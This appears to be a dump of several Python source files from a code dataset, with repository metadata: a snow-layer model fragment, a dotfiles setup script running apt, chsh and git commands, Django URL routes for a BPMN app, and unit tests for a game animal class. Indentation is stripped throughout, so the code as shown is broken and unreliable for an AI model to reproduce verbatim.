liquid_water_content[k_new, i, j] += weight * liquid_water_content_prev[k_old, i, j]
internal_energy[k_new] += weight * energy_prev[k_old, i, j]
if weight == 1.:
new_thickness -= thickness_prev[k_old, i, j]
break
thickness_prev[k_old, i, j] *= 1 - weight
ice_content_prev[k_old, i, j] *= 1 - weight
liquid_water_content_prev[k_old, i, j] *= 1 - weight
energy_prev[k_old, i, j] *= 1 - weight
k_new += 1
if k_new >= ns:
break
if weight < 1:
new_thickness = thickness[k_new, i, j]
num_layers[i, j] = ns
# Update areal heat capacity and snow temperature
heat_cap[:ns, i, j] = ( # TODO use snow_heat_capacity() for this
ice_content[:ns, i, j] * c.SPEC_HEAT_CAP_ICE
+ liquid_water_content[:ns, i, j] * c.SPEC_HEAT_CAP_WATER
)
temp[:ns, i, j] = c.T0 + internal_energy[:ns] / heat_cap[:ns, i, j]
# Update density
density[:ns, i, j] = (
(liquid_water_content[:ns, i, j] + ice_content[:ns, i, j])
/ thickness[:ns, i, j]
)
| 30.470492
| 161
| 0.559907
| 5,494
| 0.295424
| 0
| 0
| 12,904
| 0.693875
| 0
| 0
| 6,343
| 0.341077
|
5596e16fb509c3accc1b616f5872b39869a62e82
| 2,746
|
py
|
Python
|
scripts/custom_task_manager.py
|
operaun/dotfiles
|
6e91206427199a9f6a9ac7397a886ac2f26eade0
|
[
"MIT"
] | 1
|
2016-10-06T12:31:04.000Z
|
2016-10-06T12:31:04.000Z
|
scripts/custom_task_manager.py
|
operaun/dotfiles
|
6e91206427199a9f6a9ac7397a886ac2f26eade0
|
[
"MIT"
] | null | null | null |
scripts/custom_task_manager.py
|
operaun/dotfiles
|
6e91206427199a9f6a9ac7397a886ac2f26eade0
|
[
"MIT"
] | null | null | null |
# scripts/custom_task_manager.py
import os
import subprocess
from abc import ABCMeta, abstractmethod
from pretty_printer import *
class CustomTaskManager(object):
def __init__(self):
self.tasks = list()
def printMessages(self):
for task in self.tasks:
task.printHelpMessage()
def doWorks(self):
for task in self.tasks:
task.doWork()
def addTask(self, task):
self.tasks.append(task)
class CustomTask(object):
__metaclass__ = ABCMeta
@classmethod
def printHelpMessage(self): raise NotImplementedError
@classmethod
def doWork(self): raise NotImplementedError
class ZshTask(CustomTask):
def __readStringFromCmd(self, cmd):
ret_string = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True).stdout.readline()
if len(ret_string) == 0:
return False
return ret_string
def printHelpMessage(self):
printBlue("\t Default Zsh: change $SHELL config")
def doWork(self):
zsh_file_path = self.__readStringFromCmd("which zsh")
if (zsh_file_path == False):
printHeader("Can not find zsh installation")
printHeader("Your new default shell path($SHELL): %s" % zsh_file_path)
os.system("chsh -s %s" % zsh_file_path)
class VimUpdateTask(CustomTask):
def printHelpMessage(self):
printBlue("\t Vim 8: upgrade vim version")
def doWork(self):
os.system("add-apt-repository ppa:pi-rho/dev")
os.system("apt update")
os.system("apt install vim")
class VimColorTask(CustomTask):
def printHelpMessage(self):
printBlue("\t Jellybeans color: color for VIM")
def doWork(self):
os.system("mkdir -p ~/.vim/colors")
os.system("cp ./custom_files/jellybeans.vim ~/.vim/colors/")
class VimVundleTask(CustomTask):
def printHelpMessage(self):
printBlue("\t Vundle: plugin framework for VIM")
def doWork(self):
os.system("mkdir -p ~/.vim/bundle")
os.system("git clone https://github.com/VundleVim/Vundle.vim.git ~/.vim/bundle/Vundle.vim")
os.system("vim +PluginInstall +qall")
class GitConfigTask(CustomTask):
def printHelpMessage(self):
printBlue("\t Git: setting personal configuration for Git")
def doWork(self):
os.system('git config --global user.name "Jongmin Won"')
os.system('git config --global user.email "operaun@gmail.com"')
os.system('git config --global merge.tool vimdiff')
os.system('git config --global core.editor vim')
os.system('git config --global core.autocrlf false')
os.system('git config --global core.filemode false')
os.system('git config --global color.ui true')
| 31.204545
| 99
| 0.659505
| 2,600
| 0.946832
| 0
| 0
| 130
| 0.047342
| 0
| 0
| 875
| 0.318645
|
5598265430fb84db260c24576996f2ee0f789ef1
| 27
|
py
|
Python
|
exercises/acronym/acronym.py
|
RJTK/python
|
f9678d629735f75354bbd543eb7f10220a498dae
|
[
"MIT"
] | 1
|
2021-05-15T19:59:04.000Z
|
2021-05-15T19:59:04.000Z
|
exercises/acronym/acronym.py
|
RJTK/python
|
f9678d629735f75354bbd543eb7f10220a498dae
|
[
"MIT"
] | null | null | null |
exercises/acronym/acronym.py
|
RJTK/python
|
f9678d629735f75354bbd543eb7f10220a498dae
|
[
"MIT"
] | 2
|
2018-03-03T08:32:12.000Z
|
2019-08-22T11:55:53.000Z
|
def abbreviate():
pass
| 9
| 17
| 0.62963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
5598bbdfc235215336c94064608a0db8ff763655
| 3,961
|
py
|
Python
|
bpmn/urls.py
|
VSSantana/SFDjango-BPMN
|
e5a3fb8da9282fd88f72a85a4b34d89d38391e36
|
[
"MIT"
] | 1
|
2021-09-21T00:02:10.000Z
|
2021-09-21T00:02:10.000Z
|
bpmn/urls.py
|
VSSantana/SFDjango-BPMN
|
e5a3fb8da9282fd88f72a85a4b34d89d38391e36
|
[
"MIT"
] | 5
|
2021-09-22T13:54:06.000Z
|
2021-09-22T14:05:56.000Z
|
bpmn/urls.py
|
marcelobbfonseca/SFDjango-BPMN
|
50565763414f52d9e84004494cf550c6fe2358fa
|
[
"MIT"
] | 1
|
2021-09-18T01:22:25.000Z
|
2021-09-18T01:22:25.000Z
|
from django.urls import path
from django.contrib.auth.views import LoginView
from .views.activity_view import *
from .views.activity_type_view import *
from .views.event_view import *
from .views.flow_view import *
from .views.lane_view import *
from .views.pool_view import *
from .views.process_type_view import *
from .views.process_view import *
from .views.sequence_view import *
urlpatterns = [
path('', LoginView.as_view(template_name='accounts/login.html'), name="login"),
path('activity_type_list/', ActivityTypeView.as_view(), name='activity_type_list'),
path('activity_type_create_form/', ActivityTypeCreate.as_view(), name='activity_type_create_form'),
path('activity_type_update_form/<int:pk>', ActivityTypeUpdate.as_view(), name='activity_type_update_form'),
path('activity_type_delete_confirmation/<int:pk>', ActivityTypeDelete.as_view(), name='activity_type_delete_confirmation'),
path('process_type_list/', ProcessTypeView.as_view(), name='process_type_list'),
path('process_type_create_form/', ProcessTypeCreate.as_view(), name='process_type_create_form'),
path('process_type_update_form/<int:pk>', ProcessTypeUpdate.as_view(), name='process_type_update_form'),
path('process_type_delete_confirmation/<int:pk>', ProcessTypeDelete.as_view(), name='process_type_delete_confirmation'),
path('pool_list/', PoolView.as_view(), name='pool_list'),
path('pool_create_form/', PoolCreate.as_view(), name='pool_create_form'),
path('pool_update_form/<int:pk>', PoolUpdate.as_view(), name='pool_update_form'),
path('pool_delete_confirmation/<int:pk>', PoolDelete.as_view(), name='pool_delete_confirmation'),
path('lane_list/', LaneView.as_view(), name='lane_list'),
path('lane_create_form/', LaneCreate.as_view(), name='lane_create_form'),
path('lane_update_form/<int:pk>', LaneUpdate.as_view(), name='lane_update_form'),
path('lane_delete_confirmation/<int:pk>', LaneDelete.as_view(), name='lane_delete_confirmation'),
path('event_list/', EventView.as_view(), name='event_list'),
path('event_create_form/', EventCreate.as_view(), name='event_create_form'),
path('event_update_form/<int:pk>', EventUpdate.as_view(), name='event_update_form'),
path('event_delete_confirmation/<int:pk>', EventDelete.as_view(), name='event_delete_confirmation'),
path('activity_list/', ActivityView.as_view(), name='activity_list'),
path('activity_create_form/', ActivityCreate.as_view(), name='activity_create_form'),
path('activity_update_form/<int:pk>', ActivityUpdate.as_view(), name='activity_update_form'),
path('activity_delete_confirmation/<int:pk>', ActivityDelete.as_view(), name='activity_delete_confirmation'),
path('sequence_list/', SequenceView.as_view(), name='sequence_list'),
path('sequence_create_form/', SequenceCreate.as_view(), name='sequence_create_form'),
path('sequence_update_form/<int:pk>', SequenceUpdate.as_view(), name='sequence_update_form'),
path('sequence_delete_confirmation/<int:pk>', SequenceDelete.as_view(), name='sequence_delete_confirmation'),
path('flow_list/', FlowView.as_view(), name='flow_list'),
path('flow_create_form/', FlowCreate.as_view(), name='flow_create_form'),
path('flow_update_form/<int:pk>', FlowUpdate.as_view(), name='flow_update_form'),
path('flow_delete_confirmation/<int:pk>', FlowDelete.as_view(), name='flow_delete_confirmation'),
path('process_list/', ProcessView.as_view(), name='process_list'),
path('process_create_form/', ProcessCreate.as_view(), name='process_create_form'),
path('process_update_form/<int:pk>', ProcessUpdate.as_view(), name='process_update_form'),
path('process_delete_confirmation/<int:pk>', ProcessDelete.as_view(), name='process_delete_confirmation'),
path('process-modeling/', ProcessModelingView.as_view(), name="process_modeling"),
path('ontology-suggestion', OntologySuggestionView.as_view(), name="ontology_suggestion")
]
| 73.351852
| 127
| 0.757637
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,835
| 0.463267
|
5598fc6baf6adbca126912ba31690ef9d92c7c11
| 2,106
|
py
|
Python
|
utils/boilerplate/test_gorilla.py
|
cfginn/sap-simulation-package
|
73314e5380cec5c61a9fe5ff5fbafa25b9e2beac
|
[
"MIT"
] | null | null | null |
utils/boilerplate/test_gorilla.py
|
cfginn/sap-simulation-package
|
73314e5380cec5c61a9fe5ff5fbafa25b9e2beac
|
[
"MIT"
] | null | null | null |
utils/boilerplate/test_gorilla.py
|
cfginn/sap-simulation-package
|
73314e5380cec5c61a9fe5ff5fbafa25b9e2beac
|
[
"MIT"
] | null | null | null |
import unittest
from pysapets.gorilla import Gorilla
from pysapets.animal import Animal
import pysapets.constants as constants
from unittest.mock import patch
from io import StringIO
from copy import deepcopy
class GorillaTest(unittest.TestCase):
def setUp(self):
self.gorilla = Gorilla()
self.friends = [self.gorilla, Animal(2, 2), Animal(2, 2), Animal(2, 2), Animal(2, 2)]
# test that get_type returns the correct type
def test_get_type(self):
self.assertEqual(self.gorilla.get_type(), constants.GORILLA)
# test that gorilla starts with base health of 6
def test_get_health(self):
self.assertEqual(self.gorilla.get_health(), 6)
# test that gorilla starts with base attack of 6
def test_get_attack(self):
self.assertEqual(self.gorilla.get_attack(), 6)
# test that initializing gorilla with additional health increases health
def test_init_add_health(self):
newGorilla = Gorilla(addHealth = 3)
self.assertEqual(newGorilla.get_health(), 6 + 3)
# test that initializing an gorilla with additional attack increases attack
def test_init_add_attack(self):
newGorilla = Gorilla(addAttack = 3)
self.assertEqual(newGorilla.get_attack(), 6 + 3)
# test that initializing gorilla with additional health and attack increases health and attack
def test_init_add_health_attack(self):
newGorilla = Gorilla(addHealth = 3, addAttack = 3)
self.assertEqual(newGorilla.get_health(), 6 + 3)
self.assertEqual(newGorilla.get_attack(), 6 + 3)
# test that gorilla ability has correct trigger
def test_get_ability_trigger(self):
self.assertEqual(self.gorilla.get_ability_trigger(), constants.HURT)
# test that gorilla ability has correct triggeredBy
def test_get_ability_triggeredBy(self):
self.assertEqual(self.gorilla.get_ability_triggeredBy(), constants.SELF)
# TODO add relevant tests for gorilla ability
def test_run_ability(self):
pass
def test_run_ability_level_1(self):
pass
def test_run_ability_level_2(self):
pass
def test_run_ability_level_3(self):
pass
| 31.432836
| 96
| 0.74359
| 1,878
| 0.891738
| 0
| 0
| 0
| 0
| 0
| 0
| 526
| 0.249763
|